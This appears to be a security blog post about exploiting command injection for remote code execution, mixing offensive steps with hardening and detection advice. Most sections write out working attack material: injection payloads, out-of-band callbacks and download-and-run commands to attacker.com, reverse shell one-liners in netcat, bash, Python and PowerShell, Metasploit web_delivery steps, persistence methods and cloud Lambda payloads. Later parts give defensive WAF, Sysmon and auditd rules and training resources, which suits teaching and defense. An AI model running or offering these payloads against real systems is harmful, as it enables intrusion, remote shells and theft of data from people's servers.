How a Single Command Injection Turned Into Full Remote Code Execution on a Fortune 500 (And Why Your Dev Team Is Next) + Video

By /

Listen to this Post

Featured Image

Introduction:

Remote Code Execution (RCE) remains the holy grail for attackers and bug bounty hunters alike—it allows arbitrary command execution on a target server, often leading to complete system compromise. The casual LinkedIn post “I got remote code execution on another company!” highlights a stark reality: many organizations still expose vulnerable endpoints that trivialize RCE via unsanitized inputs, outdated libraries, or misconfigured cloud services. Understanding how RCE works from initial discovery to exploitation and mitigation is no longer optional for modern security teams.

Learning Objectives:

  • Identify and manually test for command injection and unsafe deserialization vulnerabilities across Linux/Windows environments.
  • Execute controlled RCE exploitation using native command-line tools, Metasploit, and custom scripts.
  • Apply layered mitigations including input validation, WAF rules, and immutable infrastructure patterns to block RCE.

You Should Know:

  1. Understanding Remote Code Execution (RCE) – The Anatomy of a Takeover

RCE occurs when an attacker injects operating system commands or malicious code into an application’s execution context. The most common vector is command injection via web parameters, file uploads, or HTTP headers. For example, a vulnerable PHP application might call `system($_GET[‘cmd’])` without sanitization.

Step‑by‑step guide to testing for RCE:

Linux – Use `curl` to inject a time‑based payload:

curl -X GET "http://target.com/page?file=document.pdf; sleep 5"

If the response delays by 5 seconds, command injection exists. To confirm and get output:

curl "http://target.com/page?file=document.pdf; ls%20-la"

Windows – Inject ping or `dir` with URL encoding:

Invoke-WebRequest -Uri "http://target.com/search?q=test%26dir%20C:\"

Look for directory listings in the HTML response.

For blind RCE, use out‑of‑band (OOB) techniques:

 Linux – DNS exfiltration
curl "http://target.com/upload?name=test; nslookup whoami.attacker.com"
 Windows – PowerShell callback
curl "http://target.com/api?input=test; powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/rev.ps1')"

2. Mapping the Attack Surface for RCE Opportunities

Before exploiting, you need a reconnaissance phase. Focus on user input interfaces: search bars, file uploads, API endpoints, and even HTTP headers like `User-Agent` or X-Forwarded-For. Use automated scanners but verify manually.

Step‑by‑step guide using Nmap and custom fuzzing:

1. Discover web servers and common RCE‑prone paths:

nmap -p 80,443,8080,8443 --script http-enum,http-vuln target.com

2. Fuzz for command injection using `ffuf` and a wordlist of dangerous characters (;, |, &&, `):

ffuf -u "http://target.com/ping?ip=FUZZ" -w payloads.txt -mr "uid=|ping=|dir "

3. For API security, test JSON parameters:

curl -X POST https://api.target.com/v1/exec -H "Content-Type: application/json" -d '{"command":"; cat /etc/passwd"}'

If the API logs or executes unsanitized data, you’ve found an RCE.

3. Exploiting a Realistic RCE Vulnerability (Lab Setup)

Set up a local vulnerable container to practice ethical exploitation. Use `damnvulnerableweb` or `DVWA` with command injection level set to high.

Step‑by‑step manual exploitation:

Linux target example (command injection via ping tool):

  • The vulnerable form accepts an IP and runs ping -c 4 $ip.
  • Inject: `127.0.0.1; wget http://attacker.com/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh`
    – This downloads and executes a reverse shell script.

Reverse shell one‑liners (Linux):

 Netcat traditional
nc -e /bin/sh attacker_ip 4444

Bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Python (when netcat is missing)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows target reverse shell using PowerShell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://attacker_ip/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress attacker_ip -Port 4444"

Using Metasploit for staged payloads:

msfconsole
use exploit/multi/script/web_delivery
set target 2  PowerShell
set payload windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
run

Paste the generated one‑liner on the vulnerable Windows server.

  1. Mitigation & Hardening – From Patch to Prevention

Blocking RCE requires defense in depth. Apply these steps immediately.

Step‑by‑step hardening guide:

1. Input validation (allow‑list approach):

  • For IP fields, only allow IPv4/v6 patterns via regex.
  • For file uploads, reject any filename containing ;, |, $, `.

2. Use parameterized APIs and avoid system calls:

Replace `system()` with language‑safe alternatives (e.g., `subprocess.run` with `shell=False` in Python).

  1. Deploy a Web Application Firewall (WAF) with custom rules:
    ModSecurity rule example to block `;` and `|` in query strings:

    SecRule ARGS "@rx [;&|`\$]" "id:100,phase:2,deny,status:403,msg:'Command Injection'"

4. Cloud hardening (AWS):

  • Use Systems Manager Parameter Store for secrets, never inline commands.
  • Enforce IMDSv2 to prevent metadata‑based RCE.
  • AWS WAF with managed rule group AWSManagedRulesLinuxRuleSet. 
    aws wafv2 create-web-acl --name BlockRCE --scope REGIONAL --default-action Block={} --rules ...

5. Linux kernel hardening:

  • Enable SELinux or AppArmor to confine web server processes.
  • Disable dangerous functions in php.ini: disable_functions = exec,passthru,shell_exec,system.

6. Windows specific:

  • Enable Windows Defender Application Control (WDAC) to block unapproved binaries.
  • Disable PowerShell script execution unless signed: Set-ExecutionPolicy AllSigned.
  1. Post‑Exploitation & Detection – How to Know You’ve Been Owned

Understanding what an attacker does after RCE helps blue teams build detection analytics.

Step‑by‑step post‑exploitation actions (red team perspective):

1. Enumeration:

 Linux
id; uname -a; cat /etc/passwd; netstat -tulpn
 Windows
whoami /all; systeminfo; netstat -ano

2. Persistence:

  • Linux: add SSH key to `/root/.ssh/authorized_keys` or cron job.
  • Windows: scheduled task or registry run key.
  1. Lateral movement using PsExec or SSH key theft.

Detection (blue team):

  • Monitor for anomalous process creation (e.g., `cmd.exe` spawning powershell.exe). Use Sysmon config: 
    <EventFiltering>
<ProcessCreate onmatch="include">
<ParentImage condition="is">C:\Windows\System32\cmd.exe</ParentImage>
<Image condition="contains">powershell</Image>
</ProcessCreate>
</EventFiltering>
  • Linux auditd rule to alert on `execve` of shells from web server user: 
    -w /usr/bin/bash -p x -k webshell
  • Deploy EDR with behavioral rules for WMI and remote service creation.
  1. Ethical Hacking Training & Certifications to Master RCE

To legally practice and report RCE findings, structured learning is essential.

Recommended courses and certifications:

  • Practical Ethical Hacking by TCM Security – includes hands‑on RCE labs.
  • OSCP (Offensive Security Certified Professional) – exams require manual command injection exploitation.
  • PortSwigger Web Security Academy – free labs on OS command injection and code injection.
  • INE’s eJPT / eCPPT – great for beginners with a focus on real‑world RCE.

Free labs to develop skills:

  • HackTheBox – machines like “Bashed” and “Craft” teach RCE.
  • TryHackMe – rooms “Command Injection” and “OWASP Top 10”.
  • VulnHub – download vulnerable VMs (e.g., “DC‑1”, “Mr-Robot”).

Lab setup command (Docker for local DVWA):

docker run --rm -p 80:80 vulnerables/web-dvwa
 Login admin/password, set security level to low, navigate to Command Injection.
  1. API Security & Cloud RCE – The Modern Attack Surface

APIs are now the leading RCE vector due to serverless functions and GraphQL endpoints.

Step‑by‑step testing of a GraphQL endpoint:

1. Introspect the schema:

query { __schema { types { name fields { name } } } }

2. Look for fields like exec, system, bash, eval. If found, attempt:

mutation { runCommand(cmd: "cat /etc/passwd") }

3. For REST APIs, fuzz JSON parameters with payloads like:

{"username": "admin"; curl attacker.com/steal}

Cloud‑specific RCE (AWS Lambda example):

If a Lambda function unsafely uses os.system(event['user_input']), an attacker can invoke it via:

aws lambda invoke --function-name vulnerableFunc --payload '{"user_input":"; curl http://attacker.com/creds.sh | bash"}' out.txt

Hardening: Use AWS WAF to filter malicious JSON, enforce IAM least privilege, and never embed user input into system calls – use SDK APIs instead.

What Undercode Say:

  • Key Takeaway 1: Remote code execution is not a theoretical risk – it surfaces from mundane insecure coding patterns like unsanitized shell calls, and it can be reliably discovered with a handful of fuzzing commands.
  • Key Takeaway 2: Layered mitigations (WAF + allow‑list input validation + runtime application self‑protection) remain the only effective defense, as no single patch covers all RCE variants.

Additionally, the casual “I got RCE on another company” conversation underscores a cultural gap: ethical hackers and developers rarely share the same language. Until organizations embed continuous, hands‑on RCE training across their DevOps pipelines, we will keep seeing headlines about data breaches starting from a single semicolon. The commands and steps shown above are not just for attackers – they are the diagnostic tools every defender must master to understand and block real‑world intrusions.

Prediction:

Within the next 24 months, attackers will shift from classic web‑based command injection to AI‑generated payloads that dynamically adapt to input validation logic. We will also see a surge in supply‑chain RCE, where malicious code is injected into open‑source libraries that parse configuration files. Consequently, regulatory bodies will mandate runtime protection for APIs, and bug bounty payouts for blind RCE vulnerabilities will exceed $50,000 – forcing organizations to adopt immutable infrastructure and eBPF‑based detection as standard practice.

▶️ Related Video (64% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: %F0%9D%97%A0%F0%9D%97%B2 %F0%9D%97%9C – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: